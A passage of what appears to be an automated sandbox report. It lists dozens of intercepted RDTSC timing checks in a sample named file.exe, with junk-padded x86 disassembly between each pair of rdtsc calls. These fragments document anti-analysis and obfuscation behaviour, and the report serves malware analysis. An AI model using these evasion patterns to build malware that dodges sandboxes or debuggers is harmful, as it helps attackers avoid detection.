    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314DDD second address: 314DF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F655118F746h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315E7C second address: 315E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 318D9E second address: 318DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 317F97 second address: 317FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 js 00007F65504F5A46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 317FA5 second address: 317FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F655118F74Dh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31901C second address: 319053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F65504F5A58h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65504F5A54h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31B153 second address: 31B158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 321F4D second address: 321F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 321F53 second address: 321F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F655118F759h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 321F74 second address: 321F9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65504F5A4Eh 0x0000000d jmp 00007F65504F5A53h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322100 second address: 322104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322104 second address: 32210D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32210D second address: 322113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322113 second address: 322127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jnc 00007F65504F5A46h 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322127 second address: 32213F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F655118F752h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32213F second address: 322143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322143 second address: 322165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F655118F746h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3223B3 second address: 3223B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3223B9 second address: 3223BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C92E8 second address: 2C9303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F65504F5A54h 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 327618 second address: 327630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007F655118F746h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 327630 second address: 32764F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F65504F5A46h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32EB17 second address: 32EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F655118F746h 0x0000000a popad 0x0000000b js 00007F655118F748h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F655118F74Ah 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CADA7 second address: 2CADAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CADAD second address: 2CADB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CADB1 second address: 2CADBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CADBB second address: 2CADC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CADC1 second address: 2CADCB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65504F5A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DEE4 second address: 32DEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DEE8 second address: 32DEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E479 second address: 32E480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E480 second address: 32E48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F65504F5A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E48C second address: 32E490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E490 second address: 32E49A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65504F5A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E49A second address: 32E4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F655118F748h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jbe 00007F655118F746h 0x0000001b pop edi 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push edi 0x00000022 pop edi 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E78E second address: 32E794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E794 second address: 32E7BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F750h 0x00000007 jmp 00007F655118F74Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F655118F74Bh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E970 second address: 32E976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333B0E second address: 333B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F655118F746h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333B1A second address: 333B2A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65504F5A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333B2A second address: 333B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333C9C second address: 333CAC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F65504F5A48h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333CAC second address: 333CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push esi 0x0000000d jns 00007F655118F746h 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333F5E second address: 333F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333F67 second address: 333F7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F655118F751h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC2A second address: 2EAC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC2E second address: 2EAC42 instructions: 0x00000000 rdtsc 0x00000002 je 00007F655118F746h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F655118F74Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC42 second address: 2EAC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F65504F5A53h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC60 second address: 2EAC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC64 second address: 2EAC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F65504F5A4Ah 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC74 second address: 2EAC7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC7C second address: 2EAC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339FB1 second address: 339FC1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F655118F746h 0x00000008 jp 00007F655118F746h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339FC1 second address: 339FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339FC7 second address: 339FD5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F655118F74Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C455B second address: 2C455F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338D02 second address: 338D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338D0A second address: 338D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338FFA second address: 339000 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339982 second address: 339986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33FA75 second address: 33FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF56C second address: 2BF583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007F65504F5A46h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF583 second address: 2BF58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF58B second address: 2BF591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF591 second address: 2BF596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF596 second address: 2BF59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF59C second address: 2BF5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF5A2 second address: 2BF5A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3410E4 second address: 341101 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F655118F754h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 345177 second address: 34517D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34517D second address: 345194 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F655118F746h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FF365 second address: 2FF36F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65504F5A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FF36F second address: 2EA097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov cl, 91h 0x00000009 mov dword ptr [ebp+122D211Dh], eax 0x0000000f call dword ptr [ebp+122D3520h] 0x00000015 push ecx 0x00000016 push eax 0x00000017 jmp 00007F655118F755h 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FF496 second address: 2FF4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FF4AF second address: 2FF4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FFA1E second address: 2FFA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F65504F5A46h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FFB34 second address: 2FFB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FFCD1 second address: 2FFCD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FFCD5 second address: 2FFCE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F655118F746h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FFE61 second address: 2FFED2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F65504F5A48h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov cl, bl 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F65504F5A48h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 nop 0x00000049 jmp 00007F65504F5A50h 0x0000004e push eax 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007F65504F5A46h 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3001A6 second address: 3001AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3001AC second address: 30020A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F65504F5A55h 0x00000011 nop 0x00000012 sbb cl, 00000023h 0x00000015 push 0000001Eh 0x00000017 jmp 00007F65504F5A52h 0x0000001c nop 0x0000001d jmp 00007F65504F5A4Ch 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30020A second address: 30021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F655118F74Fh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3004EB second address: 3004EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3004EF second address: 300504 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300504 second address: 30052A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65504F5A48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jnl 00007F65504F5A4Ah 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007F65504F5A4Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30052A second address: 30052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30052E second address: 300533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300634 second address: 300638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300638 second address: 2EAC2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F65504F5A48h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 clc 0x00000022 lea eax, dword ptr [ebp+1247F065h] 0x00000028 push esi 0x00000029 pushad 0x0000002a or dword ptr [ebp+1245A55Bh], edi 0x00000030 call 00007F65504F5A59h 0x00000035 pop esi 0x00000036 popad 0x00000037 pop edi 0x00000038 nop 0x00000039 jmp 00007F65504F5A4Ah 0x0000003e push eax 0x0000003f pushad 0x00000040 jmp 00007F65504F5A58h 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 push edi 0x00000049 pop edi 0x0000004a popad 0x0000004b popad 0x0000004c nop 0x0000004d stc 0x0000004e call dword ptr [ebp+122D3222h] 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3447A1 second address: 3447A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3448F4 second address: 344914 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65504F5A56h 0x00000008 jg 00007F65504F5A46h 0x0000000e jmp 00007F65504F5A4Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F65504F5A46h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 344D5C second address: 344D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
